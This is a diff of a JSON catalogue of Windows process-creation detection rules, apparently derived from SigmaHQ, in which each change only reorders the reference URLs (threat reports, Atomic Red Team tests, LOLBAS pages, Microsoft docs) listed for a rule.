@@ -60324,8 +60324,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" ], "tags": [ @@ -60468,8 +60468,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" ], "tags": [ @@ -60561,8 +60561,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" ], "tags": [ 
@@ -60652,8 +60652,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" ], "tags": [ @@ -60694,9 +60694,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" ], @@ -60796,8 +60796,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://redcanary.com/blog/raspberry-robin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" ], "tags": [ 
@@ -60897,9 +60897,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" ], "tags": [ @@ -60992,9 +60992,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", - "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" ], "tags": [ 
@@ -61037,8 +61037,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml"
 ],
@@ -61186,8 +61186,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/intelligence-insights-december-2021",
 "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html",
+ "https://redcanary.com/blog/intelligence-insights-december-2021",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml"
 ],
 "tags": [
@@ -61271,8 +61271,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml"
 ],
 "tags": [
@@ -61296,9 +61296,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
 "https://github.com/hfiref0x/UACME",
 "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/",
+ "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml"
 ],
 "tags": [
@@ -61851,8 +61851,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/",
 "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml"
 ],
 "tags": [
@@ -62088,11 +62088,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html",
 "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md",
- "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/",
 "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee",
+ "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html",
+ "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml"
 ],
 "tags": [
@@ -62407,8 +62407,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html",
 "https://github.com/GhostPack/Seatbelt",
+ "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml"
 ],
 "tags": [
@@ -62614,8 +62614,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml"
 ],
 "tags": [
@@ -62639,8 +62639,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool",
 "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml"
 ],
 "tags": [
@@ -62663,8 +62663,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml"
 ],
 "tags": [
@@ -62791,8 +62791,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
- "https://twitter.com/splinter_code/status/1483815103279603714",
 "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
+ "https://twitter.com/splinter_code/status/1483815103279603714",
 "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml"
 ],
@@ -62909,8 +62909,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md",
+ "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml"
 ],
 "tags": [
@@ -63143,8 +63143,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
 "https://github.com/shantanu561993/SharpChisel",
+ "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml"
 ],
 "tags": [
@@ -63178,8 +63178,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
 "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"
 ],
 "tags": [
@@ -63203,11 +63203,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997",
 "http://blog.sevagas.com/?Hacking-around-HTA-files",
- "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script",
 "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356",
 "https://twitter.com/mattifestation/status/1326228491302563846",
+ "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997",
+ "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml"
 ],
 "tags": [
@@ -63395,8 +63395,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/harr0ey/status/991670870384021504",
 "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml",
+ "https://twitter.com/harr0ey/status/991670870384021504",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml"
 ],
 "tags": [
@@ -63429,9 +63429,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
 "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html",
 "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
- "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml"
 ],
 "tags": [
@@ -63555,9 +63555,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
 "https://twitter.com/jonasLyk/status/1555914501802921984",
 "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml"
 ],
 "tags": [
@@ -63590,8 +63590,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml",
 "https://twitter.com/Moriarty_Meng/status/984380793383370752",
+ "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml"
 ],
 "tags": [
@@ -63998,8 +63998,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit",
 "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d",
+ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml"
 ],
 "tags": [
@@ -64105,8 +64105,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
 "https://twitter.com/_st0pp3r_/status/1583914515996897281",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml"
 ],
@@ -64173,9 +64173,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer",
 "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection",
 "https://www.exploit-db.com/exploits/37525",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml"
 ],
 "tags": [
@@ -64331,8 +64331,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1",
 "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py",
+ "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml"
 ],
 "tags": [
@@ -64412,10 +64412,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://twitter.com/cglyer/status/1355171195654709249",
 "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
+ "https://twitter.com/cglyer/status/1355171195654709249",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml"
 ],
 "tags": [
@@ -64512,11 +64512,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services",
- "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6",
 "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/",
 "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe",
 "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services",
+ "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services",
+ "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml"
 ],
 "tags": [
@@ -64653,8 +64653,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Psr/",
 "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf",
+ "https://lolbas-project.github.io/lolbas/Binaries/Psr/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml"
 ],
@@ -64703,10 +64703,10 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md",
- "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/",
- "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html",
 "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
 "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/",
+ "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml"
 ],
 "tags": [
@@ -64739,8 +64739,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
 "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
+ "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml"
 ],
 "tags": [
@@ -64790,8 +64790,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml"
 ],
 "tags": [
@@ -64877,9 +64877,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
 "https://www.poweradmin.com/paexec/",
 "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml"
 ],
 "tags": [
@@ -64912,8 +64912,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/1ZRR4H/status/1534259727059787783",
 "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/",
+ "https://twitter.com/1ZRR4H/status/1534259727059787783",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml"
 ],
 "tags": [
@@ -65073,9 +65073,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/",
- "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/",
 "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer",
+ "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/",
+ "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/",
 "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml"
 ],
@@ -65109,8 +65109,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6",
 "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html",
+ "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6",
 "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml"
 ],
@@ -65177,9 +65177,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/_st0pp3r_/status/1583914244344799235",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
+ "https://twitter.com/_st0pp3r_/status/1583914244344799235",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml"
 ],
 "tags": [
@@ -65271,8 +65271,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Gerenios/AADInternals",
 "https://o365blog.com/aadinternals/",
+ "https://github.com/Gerenios/AADInternals",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml"
 ],
 "tags": [
@@ -65299,9 +65299,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
 "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
 "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41",
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_x509enrollment.yml"
 ],
 "tags": "No established tags"
@@ -65477,8 +65477,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://attack.mitre.org/software/S0404/",
 "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://attack.mitre.org/software/S0404/",
 "https://twitter.com/vxunderground/status/1423336151860002816",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml"
 ],
@@ -65521,8 +65521,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/gN3mes1s/status/1222088214581825540",
- "https://twitter.com/gN3mes1s/status/1222095371175911424",
 "https://twitter.com/gN3mes1s/status/1222095963789111296",
+ "https://twitter.com/gN3mes1s/status/1222095371175911424",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml"
 ],
 "tags": [
@@ -65686,8 +65686,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml"
 ],
 "tags": [
@@ -65938,10 +65938,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
 "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1",
- "https://vms.drweb.fr/virus/?i=24144899",
 "https://twitter.com/JohnLaTwC/status/1415295021041979392",
+ "https://vms.drweb.fr/virus/?i=24144899",
+ "https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml"
 ],
 "tags": [
@@ -65965,8 +65965,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
 "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
